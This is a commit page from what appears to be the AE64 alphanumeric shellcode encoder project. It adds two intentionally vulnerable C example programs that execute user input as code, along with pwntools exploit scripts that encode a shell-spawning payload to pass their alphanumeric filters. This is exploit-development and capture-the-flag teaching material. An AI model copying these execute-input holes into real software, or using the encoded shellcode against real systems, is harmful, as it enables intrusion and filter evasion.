refactor: rebirth

veritas501 · Jul 6, 2021 · d22c990 · d22c990
1 parent 953e22e
commit d22c990
Show file tree

Hide file tree

Showing 10 changed files with 862 additions and 239 deletions.
diff --git a/ae64.py b/ae64.py
diff --git a/amd64_alphanum_encoder.py b/amd64_alphanum_encoder.py
diff --git a/example/example1/example1 b/example/example1/example1
diff --git a/example/example1/example1.c b/example/example1/example1.c
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <unistd.h>
+#include <string.h>
+typedef void (*func)(void);
+
+int main(void){
+	setvbuf(stdout, NULL, _IONBF, 0);
+	char tmp;
+	int re;
+	char * p = (char *)malloc(0x1000);
+	printf("> ");
+
+	for(int i = 0; i < 0x1000; i++){
+		re = read(0, &tmp, 1);
+		if(re == -1) {
+			exit(0);
+		}
+		if(isalnum(tmp)) {
+			*(p+i) = tmp;
+		} else {
+			break;
+		}
+	}
+
+	if(mprotect((void *)((int)p&~0xfff),0x1000,7) != -1){
+		puts("exec shellcode...");
+		((func)p)();
+	}else{
+		puts("error ,tell admin");
+	}
+
+	return 0;
+}
+
+
diff --git a/example/example1/exp.py b/example/example1/exp.py
@@ -0,0 +1,14 @@
+from pwn import *
+from ae64 import AE64
+
+context.log_level = 'debug'
+context.arch = 'amd64'
+
+p = process('./example1')
+
+obj = AE64()
+sc = obj.encode(asm(shellcraft.sh()),'r13')
+
+p.sendline(sc)
+
+p.interactive()
diff --git a/example/example2/example2 b/example/example2/example2
diff --git a/example/example2/example2.c b/example/example2/example2.c
@@ -0,0 +1,70 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <ctype.h>
+typedef void (*func)(void *,void *);
+
+
+//amd64
+const char sc_start[] = "\x48\x89\xfc\x48\x89\xf0\x48\x31\xdb\x48\x31\xc9"
+                        "\x48\x31\xd2\x48\x31\xff\x48\x31\xf6\x4d\x31\xc0"
+                        "\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4"
+                        "\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff\x48\x31\xed";
+
+void check_sc(char *s){
+    int len = strlen(s);
+    for(int i=0;i<len;i++){
+        if(!isalnum(s[i])){
+            puts("Sorry i dont understand :(");
+            exit(4);
+        }
+    }
+}
+
+int main(void){
+    setvbuf(stdin,0,2,0);
+	setvbuf(stdout,0,2,0);
+	setvbuf(stderr,0,2,0);
+
+    int fd = open("/dev/urandom",0);
+    if(fd<0){
+		printf("Open urandom error!!\n");
+		exit(1);
+	}
+	void * rwx_addr;
+    void * rw_addr;
+	if(read(fd,&rwx_addr,sizeof(void *)) == -1){
+		printf("Read urandom error!!\n");
+		exit(2);
+	}
+    if(read(fd,&rw_addr,sizeof(void *)) == -1){
+		printf("Read urandom error!!\n");
+		exit(2);
+	}
+	rwx_addr = (void *)(((size_t)(rwx_addr)&~0xfff)%0x133700000000);
+    rw_addr = (void *)(((size_t)(rw_addr)&~0xfff)%0x133700000000);
+	void * rwx_page = mmap(rwx_addr,0x1000,7,34,-1,0);
+    void * rw_page = mmap(rw_addr,0x1000,3,34,-1,0);
+	if((rwx_page != rwx_addr) || (rw_page != rw_addr)){
+		printf("mmap error!!\n");
+		exit(3);
+	}
+
+    int sc_start_len = strlen(sc_start);
+    strcpy(rwx_addr,sc_start);
+
+    char buffer[0x1000];
+    memset(buffer,0,0x1000);
+    int n = read(0,buffer,0x1000-sc_start_len);
+    if(buffer[n-1] == '\n'){
+        buffer[n-1]=0;
+    }
+    check_sc(buffer);
+    strncpy(rwx_addr+sc_start_len,buffer,0x1000-sc_start_len);
+
+    ((func)rwx_addr)(rw_addr+0x800,rwx_addr);
+    return 0;
+}
diff --git a/example/example2/exp.py b/example/example2/exp.py
@@ -0,0 +1,14 @@
+from pwn import *
+from ae64 import AE64
+
+context.log_level = 'debug'
+context.arch = 'amd64'
+
+p = process('./example2')
+
+obj = AE64()
+sc = obj.encode_small(asm(shellcraft.sh()),'rax',0x30)
+
+p.sendline(sc)
+
+p.interactive()
diff --git a/num_tbl.py b/num_tbl.py